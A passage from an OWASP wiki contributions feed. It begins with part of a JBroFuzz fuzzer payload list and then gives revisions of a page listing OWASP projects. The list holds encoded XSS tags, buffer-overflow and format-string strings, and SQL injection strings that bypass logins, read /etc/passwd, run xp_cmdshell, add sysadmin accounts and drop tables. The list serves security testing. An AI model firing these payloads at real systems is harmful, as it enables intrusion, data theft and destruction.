&lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Subere https://wiki.owasp.org/index.php?title=Category:OWASP_Project&diff=13338 Category:OWASP Project 2006-11-19T23:26:38Z <p>Subere: /* Alpha Status Projects */</p> <hr /> <div>An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.<br /> <br /> To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]<br /> <br /> Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.<br /> <br /> <br /> <br /> <br /> ==Release Quality Projects==<br /> <br /> &lt;table&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]<br /> : an online training environment for hands-on learning about application security<br /> <br /> ; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]<br /> : a tool for performing all types of security testing on web applications and web services<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]<br /> : FAQ covering many application security topics<br /> <br /> ; [[:Category:OWASP Guide Project|OWASP Guide Project]]<br /> : a massive document covering all aspects of web application and web service security<br /> <br /> ; [[:Category:OWASP Legal Project|OWASP Legal Research]]<br /> : a project focused on contracting for secure software<br /> <br /> ; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]<br /> : an awareness document that describes the top ten web application security vulnerabilities<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> <br /> ==Beta Status Projects==<br /> <br /> &lt;table valign=&quot;top&quot;&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]<br /> : a JavaScript based web application security testing suite<br /> <br /> ; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]<br /> : a new project focused on the development of encoding best practices for web applications.<br /> <br /> ; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]<br /> : an Eclipse-based source-code static analysis tool for Java<br /> <br /> ; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]<br /> : a CD containing ready to use versions of application security analysis and testing tools<br /> <br /> ; [[:Category:OWASP .NET Project|OWASP .NET Research]]<br /> : a project focused on helping .NET developers build secure applications<br /> <br /> ; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]<br /> : a project focused on combining automated capabilities with complete manual testing to get the best results<br /> <br /> ; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]<br /> : an open source black box security scanner used to assess the security of AJAX-enabled applications<br /> <br /> ; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]<br /> : a project focused on the development of SQLiX, a full perl-based SQL scanner<br /> <br /> ; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]<br /> : a project focused on the development of WSFuzzer, a full python-based Web Services SOAP fuzzer<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]<br /> : a project focused on defining process elements that reinforce application security<br /> <br /> ; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]<br /> : a new project to capture best practices for reviewing code<br /> <br /> ; [[:Category:OWASP Testing Project|OWASP Testing Guide]]<br /> : a project focused on application security testing procedures and checklists<br /> <br /> ; [[:Category:OWASP Tools Project|OWASP Tools Project]]<br /> : The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> ==Alpha Status Projects==<br /> <br /> &lt;table valign=&quot;top&quot;&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]<br /> : a web application that includes common web application vulnerabilities<br /> <br /> ; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]<br /> : a fuzzer application, supporting a number of automated security checks including basic cross site scripting checks (XSS) as well as basic SQL injection testing.<br /> <br /> ; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]<br /> : a project focused on the development of a flexible code review engine<br /> <br /> ; [[:Category:OWASP Validation Project|OWASP Validation Project]]<br /> : a project that provides guidance and tools related to validation<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]<br /> : investigating the security of AJAX enabled applications<br /> <br /> ; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]<br /> : establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment<br /> <br /> ; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]<br /> : identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security <br /> <br /> ; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]<br /> : The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.<br /> <br /> ; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Guide]]<br /> : a comprehensive and integrated guide to the fundamental building blocks of application security<br /> <br /> ; [[:Category:OWASP Java Project|OWASP Java Project]]<br /> : a project focused on helping Java and J2EE developers build secure applications<br /> <br /> ; [[:Category:OWASP Logging Project|OWASP Logging Guide]]<br /> : a project to define best practices for logging and log management<br /> <br /> ; [[:Category:OWASP PHP Project|OWASP PHP Project]]<br /> : a project focused on helping PHP developers build secure applications<br /> <br /> ; [[:Category:OWASP Risk Management Project|OWASP Risk Management Project]]<br /> : a new project focused on processes for managing application security risk<br /> <br /> ; [[:Category:OWASP WASS Project|OWASP WASS Guide]]<br /> : a standards project to develop more concrete criteria for secure applications<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> __NOTOC__</div> Subere https://wiki.owasp.org/index.php?title=Category:OWASP_Project&diff=13336 Category:OWASP Project 2006-11-19T23:21:17Z <p>Subere: /* Alpha Status Projects */</p> <hr /> <div>An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.<br /> <br /> To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]<br /> <br /> Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.<br /> <br /> <br /> <br /> <br /> ==Release Quality Projects==<br /> <br /> &lt;table&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]<br /> : an online training environment for hands-on learning about application security<br /> <br /> ; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]<br /> : a tool for performing all types of security testing on web applications and web services<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]<br /> : FAQ covering many application security topics<br /> <br /> ; [[:Category:OWASP Guide Project|OWASP Guide Project]]<br /> : a massive document covering all aspects of web application and web service security<br /> <br /> ; [[:Category:OWASP Legal Project|OWASP Legal Research]]<br /> : a project focused on contracting for secure software<br /> <br /> ; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]<br /> : an awareness document that describes the top ten web application security vulnerabilities<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> <br /> ==Beta Status Projects==<br /> <br /> &lt;table valign=&quot;top&quot;&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]<br /> : a JavaScript based web application security testing suite<br /> <br /> ; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]<br /> : a new project focused on the development of encoding best practices for web applications.<br /> <br /> ; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]<br /> : an Eclipse-based source-code static analysis tool for Java<br /> <br /> ; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]<br /> : a CD containing ready to use versions of application security analysis and testing tools<br /> <br /> ; [[:Category:OWASP .NET Project|OWASP .NET Research]]<br /> : a project focused on helping .NET developers build secure applications<br /> <br /> ; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]<br /> : a project focused on combining automated capabilities with complete manual testing to get the best results<br /> <br /> ; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]<br /> : an open source black box security scanner used to assess the security of AJAX-enabled applications<br /> <br /> ; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]<br /> : a project focused on the development of SQLiX, a full perl-based SQL scanner<br /> <br /> ; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]<br /> : a project focused on the development of WSFuzzer, a full python-based Web Services SOAP fuzzer<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]<br /> : a project focused on defining process elements that reinforce application security<br /> <br /> ; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]<br /> : a new project to capture best practices for reviewing code<br /> <br /> ; [[:Category:OWASP Testing Project|OWASP Testing Guide]]<br /> : a project focused on application security testing procedures and checklists<br /> <br /> ; [[:Category:OWASP Tools Project|OWASP Tools Project]]<br /> : The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> ==Alpha Status Projects==<br /> <br /> &lt;table valign=&quot;top&quot;&gt;&lt;tr&gt;&lt;th width=&quot;50%&quot;&gt;Tools&lt;/th&gt;&lt;th&gt;Documentation&lt;/th&gt;&lt;/tr&gt;&lt;tr valign=&quot;top&quot;&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]<br /> : a web application that includes common web application vulnerabilities<br /> <br /> ; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]<br /> : a fuzzer application, supporting a number of automated security checks including basic<br /> cross site scripting checks (XSS) as well as basic SQL injection testing.<br /> <br /> ; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]<br /> : a project focused on the development of a flexible code review engine<br /> <br /> ; [[:Category:OWASP Validation Project|OWASP Validation Project]]<br /> : a project that provides guidance and tools related to validation<br /> <br /> &lt;/td&gt;&lt;td&gt;<br /> <br /> ; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]<br /> : investigating the security of AJAX enabled applications<br /> <br /> ; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]<br /> : establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment<br /> <br /> ; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]<br /> : identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security <br /> <br /> ; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]<br /> : The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.<br /> <br /> ; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Guide]]<br /> : a comprehensive and integrated guide to the fundamental building blocks of application security<br /> <br /> ; [[:Category:OWASP Java Project|OWASP Java Project]]<br /> : a project focused on helping Java and J2EE developers build secure applications<br /> <br /> ; [[:Category:OWASP Logging Project|OWASP Logging Guide]]<br /> : a project to define best practices for logging and log management<br /> <br /> ; [[:Category:OWASP PHP Project|OWASP PHP Project]]<br /> : a project focused on helping PHP developers build secure applications<br /> <br /> ; [[:Category:OWASP Risk Management Project|OWASP Risk Management Project]]<br /> : a new project focused on processes for managing application security risk<br /> <br /> ; [[:Category:OWASP WASS Project|OWASP WASS Guide]]<br /> : a standards project to develop more concrete criteria for secure applications<br /> <br /> &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /> <br /> __NOTOC__</div> Subere https://wiki.owasp.org/index.php?title=File:Jbrofuzz_small.png&diff=13169 File:Jbrofuzz small.png 2006-11-16T23:30:12Z <p>Subere: JBroFuzz Screenshot (Small)</p> <hr /> <div>JBroFuzz Screenshot (Small)</div> Subere https://wiki.owasp.org/index.php?title=File:Jbrofuzz.png&diff=13168 File:Jbrofuzz.png 2006-11-16T23:25:05Z <p>Subere: JBroFuzz Screenshot</p> <hr /> <div>JBroFuzz Screenshot</div> Subere https://wiki.owasp.org/index.php?title=File:0.2-Screenshot.png&diff=12547 File:0.2-Screenshot.png 2006-11-14T01:45:07Z <p>Subere: A screenshot of JBroFuzz 0.2 in action!</p> <hr /> <div>A screenshot of JBroFuzz 0.2 in action!</div> Subere https://wiki.owasp.org/index.php?title=File:0.2-splash.jpg&diff=12546 File:0.2-splash.jpg 2006-11-14T01:42:31Z <p>Subere: Splash Screen of JBroFuzz 0.2</p> <hr /> <div>Splash Screen of JBroFuzz 0.2</div> Subere